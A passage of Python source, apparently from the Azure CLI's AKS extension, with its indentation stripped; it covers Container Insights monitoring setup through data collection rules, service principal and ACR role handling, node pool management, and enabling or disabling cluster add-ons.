workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip(
)
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
workspace_name = workspace_resource_id.split('/')[8]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
if not remove_monitoring:
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except HttpResponseError as ex:
raise ex
if aad_route:
cluster_resource_id = f"/subscriptions/{cluster_subscription}/resourceGroups/{cluster_resource_group_name}/providers/Microsoft.ContainerService/managedClusters/{cluster_name}"
dataCollectionRuleName = f"DCR-{workspace_name}"
dcr_resource_id = f"/subscriptions/{subscription_id}/resourceGroups/{resource_group}/providers/Microsoft.Insights/dataCollectionRules/{dataCollectionRuleName}"
from azure.cli.core.util import send_raw_request
from azure.cli.core.profiles import ResourceType
if create_dcr:
# first get the association between region display names and region IDs (because for some reason
# the "which RPs are available in which regions" check returns region display names)
region_names_to_id = {}
# retry the request up to two times
for _ in range(3):
try:
location_list_url = f"https://management.azure.com/subscriptions/{subscription_id}/locations?api-version=2019-11-01"
r = send_raw_request(cmd.cli_ctx, "GET", location_list_url)
# this is required to fool the static analyzer. The else statement will only run if an exception
# is thrown, but flake8 will complain that e is undefined if we don't also define it here.
error = None
break
except CLIError as e:
error = e
else:
# This will run if the above for loop was not broken out of. This means all three requests failed
raise error
json_response = json.loads(r.text)
for region_data in json_response["value"]:
region_names_to_id[region_data["displayName"]] = region_data["name"]
# check if region supports DCRs and DCR-A
for _ in range(3):
try:
feature_check_url = f"https://management.azure.com/subscriptions/{subscription_id}/providers/Microsoft.Insights?api-version=2020-10-01"
r = send_raw_request(cmd.cli_ctx, "GET", feature_check_url)
error = None
break
except CLIError as e:
error = e
else:
raise error
json_response = json.loads(r.text)
for resource in json_response["resourceTypes"]:
region_ids = map(lambda x: region_names_to_id[x], resource["locations"]) # map is lazy, so doing this for every region isn't slow
if resource["resourceType"].lower() == "datacollectionrules" and location not in region_ids:
raise ClientRequestError(f'Data Collection Rules are not supported for LA workspace region {location}')
elif resource["resourceType"].lower() == "datacollectionruleassociations" and cluster_region not in region_ids:
raise ClientRequestError(f'Data Collection Rule Associations are not supported for cluster region {location}')
# create the DCR
dcr_creation_body = json.dumps({"location": location,
"properties": {
"dataSources": {
"extensions": [
{
"name": "ContainerInsightsExtension",
"streams": [
"Microsoft-Perf",
"Microsoft-ContainerInventory",
"Microsoft-ContainerLog",
"Microsoft-ContainerLogV2",
"Microsoft-ContainerNodeInventory",
"Microsoft-KubeEvents",
"Microsoft-KubeHealth",
"Microsoft-KubeMonAgentEvents",
"Microsoft-KubeNodeInventory",
"Microsoft-KubePodInventory",
"Microsoft-KubePVInventory",
"Microsoft-KubeServices",
"Microsoft-InsightsMetrics"
],
"extensionName": "ContainerInsights"
}
]
},
"dataFlows": [
{
"streams": [
"Microsoft-Perf",
"Microsoft-ContainerInventory",
"Microsoft-ContainerLog",
"Microsoft-ContainerLogV2",
"Microsoft-ContainerNodeInventory",
"Microsoft-KubeEvents",
"Microsoft-KubeHealth",
"Microsoft-KubeMonAgentEvents",
"Microsoft-KubeNodeInventory",
"Microsoft-KubePodInventory",
"Microsoft-KubePVInventory",
"Microsoft-KubeServices",
"Microsoft-InsightsMetrics"
],
"destinations": [
"la-workspace"
]
}
],
"destinations": {
"logAnalytics": [
{
"workspaceResourceId": workspace_resource_id,
"name": "la-workspace"
}
]
}
}})
dcr_url = f"https://management.azure.com/{dcr_resource_id}?api-version=2019-11-01-preview"
for _ in range(3):
try:
send_raw_request(cmd.cli_ctx, "PUT", dcr_url, body=dcr_creation_body)
error = None
break
except CLIError as e:
error = e
else:
raise error
if create_dcra:
# only create or delete the association between the DCR and cluster
association_body = json.dumps({"location": cluster_region,
"properties": {
"dataCollectionRuleId": dcr_resource_id,
"description": "routes monitoring data to a Log Analytics workspace"
}})
association_url = f"https://management.azure.com/{cluster_resource_id}/providers/Microsoft.Insights/dataCollectionRuleAssociations/send-to-{workspace_name}?api-version=2019-11-01-preview"
for _ in range(3):
try:
send_raw_request(cmd.cli_ctx, "PUT" if not remove_monitoring else "DELETE", association_url, body=association_body)
error = None
break
except CLIError as e:
error = e
else:
raise error
else:
# legacy auth with LA workspace solution
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
_ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
msi_auth = True if instance.service_principal_profile.client_id == "msi" else False # this is overwritten by _update_addons(), so the value needs to be recorded here
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
